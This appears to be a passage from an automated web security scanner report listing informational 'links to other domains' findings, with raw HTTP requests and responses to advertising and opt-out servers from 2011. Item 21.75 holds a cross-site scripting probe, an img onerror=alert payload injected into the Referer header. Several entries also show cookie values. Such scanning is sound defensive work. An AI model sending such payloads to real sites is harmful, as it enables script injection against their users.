<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.fakereferrerdominator.com/referrerPathName%253FRefParName%253DRefValue%26hl%3Den%26client%3Dca-pub-7641565019577886%26adU%3Dwww.ScooterDepot.us%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNHjOOvlEMDurKyD1oNHpr_iYaRkpg" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110824/r20110719/abg.js"></script>
...[SNIP]...

21.62. http://ib.adnxs.com/ab  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ab?enc=AAAAAAAAEEApXI_C9SgMQAAAAAAAAPg_KVyPwvUoDEAAAAAAAAAQQIcXbYK40jx0cEeI8W8QIlk54mJOAAAAALdLAABlAQAA2AMAAAIAAACjbggAPWQAAAEAAABVU0QAVVNEANgCWgAPHBcC3Q4BAgUCAQQAAAAAXBljhQAAAAA.&tt_code=vert-29&udj=uf%28%27a%27%2C+22407%2C+1315103289%29%3Buf%28%27c%27%2C+133618%2C+1315103289%29%3Buf%28%27r%27%2C+552611%2C+1315103289%29%3Bppv%2815706%2C+%278375801096906282887%27%2C+1315103289%2C+1315362489%2C+133618%2C+25661%29%3B&cnd=!1xYx6wjykwgQo90hGAAgvcgBMAA4jzhAAEjYB1AAWABgeGgAcAB4AIABAIgBAJABAZgBAaABAagBArABALkBAAAAAAAAEEDBAQAAAAAAABBAyQEzMzMzMzP3P9kBAAAAAAAA8D_gAQA.&ccd=!BQXSKQjykwgQo90hGL3IASAA&referrer=http://www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917&media_subtypes=1&pp=AAABMjJDsl8k6iYL9tmoP8L7nDlZjEhOctPlYA&pubclick=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLuQ3DMAwF0O9cEOA13BIgLYqSiqyQHXQCKTOBx3SfSYK8_q1YAGxjiIqESbanRNp2ozS9kY0QA3senqvD5VW_ecX1PziMUjxnMu1KjUuk7jVTbVKlW-oSp8MNiE-HO5bzcHgAnzd-lT2113MAAAA%3D%26dst%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG6Q/E:3F.0s]#%2L_'x%SEV/i#+31!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+UxXE$1ICe*b^.=BJe(Od$<_TyZVGg1td>[#!9X=V13(0V-n(2[>dH7.).LuM^sXd=GCF-/bO1P3JWdNI6Q!=v6WStTMc; sess=1; uuid2=6422714091563403120

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 03:28:46 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Sat, 03-Dec-2011 03:28:46 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: anj=Kfu=8fG3x=Cxrx)0s]#%2L_'x%SEV/hnKu98Ep.Iujc'q65.6Q(PBE9e8LZu$k9hL'>@)z!2W$t+ztxA; path=/; expires=Sat, 03-Dec-2011 03:28:46 GMT; domain=.adnxs.com; HttpOnly
Date: Sun, 04 Sep 2011 03:28:46 GMT
Content-Length: 998

document.write('<scr' + 'ipt language=\'javascript\' type=\'text/javascript\' src=\'http://imp.fetchback.com/serve/fb/adtag.js?clicktrack=http://ib.adnxs.com/click%3FQZ4S5ClBA0CLbOf7qfEAQAAAAAAAAPg_KV
...[SNIP]...
</scr' + 'ipt>');document.write('<iframe src="http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
...[SNIP]...

21.63. http://img.pulsemgr.com/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://img.pulsemgr.com
Path:   /optout

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /optout?naichk&nocache=0.6380055 HTTP/1.1
Host: img.pulsemgr.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 10:59:03 GMT
Server: Apache/2.2.3 (CentOS)
Location: http://www.networkadvertising.org/verify/no_cookie.gif
Content-Length: 319
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.networkadvertising.org/verify/no_cookie.gif">here</a>
...[SNIP]...

21.64. http://img.pulsemgr.com/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://img.pulsemgr.com
Path:   /optout

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /optout?oochk HTTP/1.1
Host: img.pulsemgr.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p=OPTOUT

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:16:57 GMT
Server: Apache/2.2.3 (CentOS)
Location: http://www.networkadvertising.org/optout/opt_success.gif
Content-Length: 321
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.networkadvertising.org/optout/opt_success.gif">here</a>
...[SNIP]...

21.65. http://img.pulsemgr.com/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://img.pulsemgr.com
Path:   /optout

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /optout?naichk&nocache=0.2724049 HTTP/1.1
Host: img.pulsemgr.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p=OPTOUT

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:38:42 GMT
Server: Apache/2.2.3 (CentOS)
Location: http://www.networkadvertising.org/verify/cookie_optout.gif
Content-Length: 323
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.networkadvertising.org/verify/cookie_optout.gif">here</a>
...[SNIP]...

21.66. http://imp.fetchback.com/serve/fb/imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/imp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /serve/fb/imp?clicktrack=http://ib.adnxs.com/click%3FQZ4S5ClBA0CLbOf7qfEAQAAAAAAAAPg_KVyPwvUoDEAAAAAAAAAQQIcXbYK40jx0cEeI8W8QIlk54mJOAAAAALdLAABlAQAA2AMAAAIAAACjbggAPWQAAAEAAABVU0QAVVNEANgCWgAPHBcC3Q4BAgUCAQQAAAAAAh34QwAAAAA./cnd=!BQXSKQjykwgQo90hGL3IASAA/referrer=http%253A%252F%252Fwww.ndtv.com%252Farticle%252Findia%252Fturkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917/clickenc=http%253A%252F%252Fbid.openx.net%252Fclick%253Fcd%253DH4sIAAAAAAAAABXLuQ3DMAwF0O9cEOA13BIgLYqSiqyQHXQCKTOBx3SfSYK8_q1YAGxjiIqESbanRNp2ozS9kY0QA3senqvD5VW_ecX1PziMUjxnMu1KjUuk7jVTbVKlW-oSp8MNiE-HO5bzcHgAnzd-lT2113MAAAA%253D%2526dst%253D&tid=68324&type=lead HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1315097285_34021:68285:1:0:0_34024:68283:2:234:326_34024:68292:2:119122:119204_34023:68293:1:119835:119835; kwd=1_1315097285; scg=1_1315097285; ppd=1_1315097285; act=1_1315097285; uid=1_1315103291_1314893682667:5756480826433243

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:29:37 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cre=1_1315106977_34024:68324:2:0:3686_34021:68285:1:9692:9692_34024:68283:2:9926:10018_34024:68292:2:128814:128896_34023:68293:1:129527:129527; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 03:29:37 GMT; Path=/
Set-Cookie: uid=1_1315106977_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 03:29:37 GMT; Path=/
Set-Cookie: kwd=1_1315106977; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 03:29:37 GMT; Path=/
Set-Cookie: scg=1_1315106977; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 03:29:37 GMT; Path=/
Set-Cookie: ppd=1_1315106977; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 03:29:37 GMT; Path=/
Set-Cookie: act=1_1315106977; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 03:29:37 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 03:29:37 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 6022

<style type="text/css">body {margin: 0px; padding: 0px;}</style><style type="text/css">
/*
TODO customize this sample style
Syntax recommendation http://www.w3.org/TR/REC-CSS2/
*/

button.fb-fi
...[SNIP]...
<td align="center"><a href="http://get.adobe.com/flashplayer/" target="_blank">Can not display content.<br>
...[SNIP]...

21.67. http://info.yahoo.com/nai/nai-status.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.yahoo.com
Path:   /nai/nai-status.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /nai/nai-status.html?nocache=0.8411065 HTTP/1.1
Host: info.yahoo.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii

Response

HTTP/1.1 999 Unable to process request at this time -- error 999
Date: Sun, 04 Sep 2011 11:39:37 GMT
Expires: Thu, 01 Jan 1970 22:00:00 GMT
Cache-Control: no-cache, private
Cache-Control: no-store
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 5244

<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" >

<!-- Title -->
<TITLE>
Yahoo! - 999 Unable to process request at this time -- error 999
</TITLE>
<!---------------->

...[SNIP]...
<a href="http://us.rd.yahoo.com/500/*http://www.yahoo.com"><img src=http://us.i1.yimg.com/us.yimg.com/i/yahoo.gif width=147 height=31 border=0 alt="Yahoo!"></a>
...[SNIP]...

21.68. http://mc8tdi0ripmbpds25eboaupdulritrp6-a-fc-opensocial.googleusercontent.com/gadgets/ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mc8tdi0ripmbpds25eboaupdulritrp6-a-fc-opensocial.googleusercontent.com
Path:   /gadgets/ifr

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /gadgets/ifr?url=http://www.google.com/friendconnect/gadgets/osapi-0.8.xml&container=peoplesense&parent=http://social.ndtv.com/&mid=0&view=profile&d=0.560.7&lang=en&communityId=08392118198779617194&caller=http://social.ndtv.com/static/Comment/Form/?%26key%3Dae42a4f016dd1fdd208110a097b061a4%26link%3Dhttp%253A%252F%252Fwww.ndtv.com%252Farticle%252Findia%252Fturkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917%26title%3DTurkish%2BAir%2Bplane%2Bskids%2Boff%2Btaxiway%2Bat%2BMumbai%2Bairport%26ctype%3Dstory%26identifier%3Dstory-130917 HTTP/1.1
Host: mc8tdi0ripmbpds25eboaupdulritrp6-a-fc-opensocial.googleusercontent.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP="CAO PSA OUR"
Content-Type: text/html; charset=UTF-8
Expires: Sun, 04 Sep 2011 02:33:23 GMT
Cache-Control: private,max-age=300
Date: Sun, 04 Sep 2011 02:28:23 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 121870

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><script>(function(){var a=window;function b(d){this.t={};this.tick=function(d,h,c){c=
...[SNIP]...
<body dir="ltr"><script src="http://www.google.com/friendconnect/script/gadget_util.js?d=0.560.7" type="text/javascript">
</script>
...[SNIP]...

21.69. http://media.fastclick.net/nai/remove  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /nai/remove

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /nai/remove?nocache=0.1171877 HTTP/1.1
Host: media.fastclick.net
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:17:33 GMT
Location: http://www.networkadvertising.org/optout/opt_success.gif
P3P: policyref="/w3c/p3p.xml", CP="NOI NID DEVo TAIo PSAo HISo OTPo OUR DELo BUS COM NAV INT DSP COR"
Content-Length: 240
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.networkadvertising.org/optout/opt_success.gif">here</a>
...[SNIP]...

21.70. http://media.fastclick.net/nai/verify  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /nai/verify

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /nai/verify?nocache=0.9904894 HTTP/1.1
Host: media.fastclick.net
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 10:59:50 GMT
Location: http://www.networkadvertising.org/verify/cookie_optout.gif
P3P: policyref="/w3c/p3p.xml", CP="NOI NID DEVo TAIo PSAo HISo OTPo OUR DELo BUS COM NAV INT DSP COR"
Content-Length: 242
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.networkadvertising.org/verify/cookie_optout.gif">here</a>
...[SNIP]...

21.71. http://netspiderads2.indiatimes.com/ads.dll/getad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://netspiderads2.indiatimes.com
Path:   /ads.dll/getad

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ads.dll/getad?slotid=36953 HTTP/1.1
Host: netspiderads2.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; GeoDetail=254%2C915%2C58141

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:35:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Expires: Mon, 08 Dec 2008 02:35:23 GMT
Content-Type: text/html
Content-Length: 2723

<html><head><title>Indiatimes - Advertisement</title></head><body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" bottommargin="0" STYLE="background-color:transparent"></a><style type="t
...[SNIP]...
</script>

<script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.72. http://netspiderads2.indiatimes.com/ads.dll/getad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://netspiderads2.indiatimes.com
Path:   /ads.dll/getad

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ads.dll/getad?slotid=37570 HTTP/1.1
Host: netspiderads2.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; GeoDetail=254%2C915%2C58141

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:25:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Expires: Mon, 08 Dec 2008 02:25:41 GMT
Content-Type: text/html
Content-Length: 4774

<html><head><title>Indiatimes - Advertisement</title></head><body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" bottommargin="0" STYLE="background-color:transparent"><!DOCTYPE html PUB
...[SNIP]...
<![endif]-->
                   <a href="http://www.adobe.com/go/getflash">
                       <img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash player" />
                   </a>
...[SNIP]...

21.73. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/martinimediainc.com/passback/1937148775@Middle  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc12.247realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/martinimediainc.com/passback/1937148775@Middle

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /RealMedia/ads/adstream_jx.ads/martinimediainc.com/passback/1937148775@Middle?RM_Exclude=& HTTP/1.1
Host: oasc12.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_d12efm_qppm_iuuq=ffffffff09419e5e45525d5f4f58455e445a4a423660; OAX=Mhd7ak5i4akACMfX; RMFD=011R02P3O1022jF2

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:30:23 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011R03PUO3022VvT|O1022bkP|O1022jF2; expires=Wed, 04-Sep-13 03:30:23 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2090
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N553.martinimedianet/B5114832.11;sz=300x250;click0=http://oasc12.247realmedia.com/RealMedia/ads/click_lx.ads/martinimediainc.com/passback/L28/424039412/Middle/Martini/digitas_amex_fem_07_070611_336/amex_fem_ron_300.html/4d686437616b3569384d634142634167?%%CLICK%%/Martini/digitas_amex_fem_07_070611_336/pos/Middle/page/martinimediainc.com/passback/L28/ord/424039412?;pc=OAS_amex_fem_ron_300;ord=424039412?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>
\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N553.martinimedianet/B5114832.11;abr=!ie;sz=300x250;click0=http://oasc12.247realmedia.com/RealMedia/ads/click_lx.ads/martinimediainc.com/passback/L28/424039412/Middle/Martini/digitas_amex_fem_07_070611_336/amex_fem_ron_300.html/4d686437616b3569384d634142634167?%%CLICK%%/Martini/digitas_amex_fem_07_070611_336/pos/Middle/page/martinimediainc.com/passback/L28/ord/424039412?;pc=OAS_amex_fem_ron_300;ord=424039412?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
rtinimediainc.com/passback/L28/ord/424039412?http://ad.doubleclick.net/jump/N553.martinimedianet/B5114832.11;abr=!ie4;abr=!ie5;sz=300x250;pc=OAS_amex_fem_ron_300;ord=424039412?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N553.martinimedianet/B5114832.11;abr=!ie4;abr=!ie5;sz=300x250;pc=OAS_amex_fem_ron_300;ord=424039412?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

21.74. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1886024182@x96  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc12.247realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1886024182@x96

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1886024182@x96?XE&oas_pv=no_analytics&XE HTTP/1.1
Host: oasc12.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_d12efm_qppm_iuuq=ffffffff09419e5e45525d5f4f58455e445a4a423660; OAX=Mhd7ak5i4akACMfX; RMFD=011R02P3O1022jF2

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:27:15 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011R02P3P3022VvT|P1022jF2; expires=Wed, 04-Sep-13 03:27:15 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 367
Content-Type: application/x-javascript

document.write ('<!-- Martini/Segment_Matching_001/Segment_Matching_001 -->\n');
document.write ('<iframe src="https://network.realmedia.com/2/TRACK_Managed/MartiniMedia/Seg001_Secure@Bottom3" style="display: none;"></iframe>\n');
document.write ('<iframe src="https://b3.mookie1.com/2/TRACK_Managed/MartiniMedia/Seg001@Bottom3" style="display: none;"></iframe>
...[SNIP]...

21.75. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1995720457@x96  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc12.247realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1995720457@x96

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1995720457@x96?XE&oas_pv=no_analytics&XE HTTP/1.1
Host: oasc12.247realmedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india6a976%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.location)%3E1e77da311f0/48-hours-on-mumbai-airports-main-runway-still-shut-131142
Cookie: OAX=Mhd7ak5JOcoADoVu; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011R02ZNO1022VvT|O1022jF2; martinicrt=1

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:03:43 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011R03vcO3022bxY|O6022bxa|O1022jF2; expires=Wed, 04-Sep-13 04:03:43 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 367
Content-Type: application/x-javascript

document.write ('<!-- Martini/Segment_Matching_001/Segment_Matching_001 -->\n');
document.write ('<iframe src="https://network.realmedia.com/2/TRACK_Managed/MartiniMedia/Seg001_Secure@Bottom3" style="display: none;"></iframe>\n');
document.write ('<iframe src="https://b3.mookie1.com/2/TRACK_Managed/MartiniMedia/Seg001@Bottom3" style="display: none;"></iframe>
...[SNIP]...

21.76. http://oo.afy11.net/NAIIsOptOut.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oo.afy11.net
Path:   /NAIIsOptOut.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /NAIIsOptOut.aspx?nocache=0.7621363 HTTP/1.1
Host: oo.afy11.net
Proxy-Connection: keep-alive
